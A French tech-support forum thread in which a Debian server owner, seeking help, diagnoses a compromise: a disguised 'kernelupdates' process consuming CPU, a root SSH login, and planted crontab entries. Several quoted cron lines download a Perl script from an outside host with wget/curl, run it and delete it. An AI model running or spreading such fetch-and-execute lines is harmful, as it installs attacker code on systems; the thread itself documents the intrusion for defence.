Kernelupdates utilise 161 % du CPU voir plus

Fermé

yazou Messages postés 85 Date d'inscription mardi 7 novembre 2006 Statut Membre Dernière intervention 17 août 2023 - 21 mai 2014 à 10:49
ElementW Messages postés 4816 Date d'inscription dimanche 12 juin 2011 Statut Contributeur Dernière intervention 5 octobre 2021 - 21 mai 2014 à 18:14

Bonjour,

J'ai un service kernelupdates qui tourne en permanence et qui utilise beaucoup de ressources.

top - 10:00:20 up 1 day, 22:23,  1 user,  load average: 3.43, 2.68, 2.45
Tasks: 137 total,   1 running, 136 sleeping,   0 stopped,   0 zombie
Cpu(s): 17.8%us,  1.3%sy, 80.9%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:   2038696k total,  1952192k used,    86504k free,    65312k buffers
Swap:  8189936k total,        0k used,  8189936k free,   913148k cached

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
10474 root      20   0  116m 1532  708 S  161  0.1   4976:05 kernelupdates

Je reçois aussi constamment des alertes mails sur ma boite :

File:   /tmp/.ice-unix/kernelupdates
Reason: Linux Binary
Owner:  :lshellg (1000:1000)
Action: No action taken

Comment faire pour définitivement l'arrêter ?
Merci

A voir également:

Kernelupdates utilise 161 % du CPU voir plus
Temperature cpu - Guide
Voir ma maison par satellite - Guide
Comment voir qui regarde mon profil facebook - Guide
Voir mot de passe wifi android - Guide
Cpu stress - Télécharger - Informations & Diagnostic

1 réponse

Réponse 1 / 1

ElementW Messages postés 4816 Date d'inscription dimanche 12 juin 2011 Statut Contributeur Dernière intervention 5 octobre 2021 1 228
21 mai 2014 à 14:45

'lut, peut-tu récupérer ce fichier de ton serveur sur ton PC (sans le lancer évidemment; juste pour l'avoir et éventuellement l'analyser)?
Comme une recherche Google ne donne rien de probant, et au vu de l'activité CPU, je suspecte que ça soit un rootkit ou un autre programme malveillant qui aurait été installé par une faille quelconque qui aurait permis a un attaquant d'obtenir un shell sur ton serveur...
Si c'est possible, peut-tu avoir des stats de quand et comment le processus a été lancé?

yazou Messages postés 85 Date d'inscription mardi 7 novembre 2006 Statut Membre Dernière intervention 17 août 2023 2
21 mai 2014 à 15:05

Merci pour ta réponse. En fait C'est un serveur Debian sur lequel des sites drupal et un wordpress tournent.
J'ai reçu une alerte bizare il y a quelques jours, comme quoi une personne a réussi à se connecter en root :
lfd on xxxx.ovh.net: SSH login alert for user root from 85.250.124.124 (IL/Israel/85-250-124-124.bb.netvision.net.il)

lorsque j'ai tapé kill + numéro du processus correspondant à kernelupdate, tout est redevenu normal.
J'ai aussi bloqué l'adresse ip en question. Mais j'aimerais bien savoir comment me débarasser définitivement de cette menace.
Quelle est la commande à taper pour avoir des stats relatifs au process ? Désolé si cette question paraît triviale mais je n'ai pas de compétences très poussées en admin serveur.

ElementW Messages postés 4816 Date d'inscription dimanche 12 juin 2011 Statut Contributeur Dernière intervention 5 octobre 2021 1 228
21 mai 2014 à 15:10

Comme tu l'as fermé du coup on a plus certaines infos; mais ton hébergeur a-t-il (ou as-tu) un système de log de processus (on sait jamais)?
Une IP d'Israël, m'étonne pas. Vérifie tous les logs, ceux de tes CMS (Drupal&WP), ceux du serveur (ceux d'apache sont généralement dans

/var/log/apache2

/var/log/httpd

) et sauvegarde-les; va falloir faire de la lecture pour savoir ou le pirate est passé pour avoir du root... Et le fait qu'il ait eu un accès root est très mauvais signe.

yazou Messages postés 85 Date d'inscription mardi 7 novembre 2006 Statut Membre Dernière intervention 17 août 2023 2
Modifié par yazou le 21/05/2014 à 16:07

Je vois par exemple dans me logs :
Line 9331: May 21 15:42:01 nsxxxx/USR/SBIN/CRON[44335]: (root) CMD (cd /tmp;wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt;rm -f abc*)

et en tapant : crontab -e
Je vois des lignes que je n'ai pas ajouté, les voici : *
*/6 * * * * cd /tmp;wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt;rm -f abc*
*/6 * * * * cd /tmp;wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt;rm -f abc*
*/6 * * * * cd /tmp;wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt;rm -f abc*

ElementW Messages postés 4816 Date d'inscription dimanche 12 juin 2011 Statut Contributeur Dernière intervention 5 octobre 2021 1 228
Modifié par gravgun le 21/05/2014 à 16:13

Appartement il s'est servi de son propre routeur pour exécuter un script perl, qu'il a supprimé. C'est emmerdant car du coup on sait pas ce qu'il a fait. Mets le serveur hors-ligne, et lance (en tant que root si possible) la commande

find / -mmin -60

, qui va trouver les fichiers modifiés y'a moins d'1 heures (

minutes, vu que l'attaque a eue lieu il y a moins d'une heure) et fait-en une sauvegarde, va falloir encore lire...

yazou Messages postés 85 Date d'inscription mardi 7 novembre 2006 Statut Membre Dernière intervention 17 août 2023 2
Modifié par yazou le 21/05/2014 à 16:18

Mettre le serveur hors ligne va m'empêcher d'utiliser, ssh, non ?
J'avais pensé virer "rm -f abc*" de sa ligne pour voir le contenu de ce ficher.
J'ai aussi trouvé un topic peut être utile...
https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server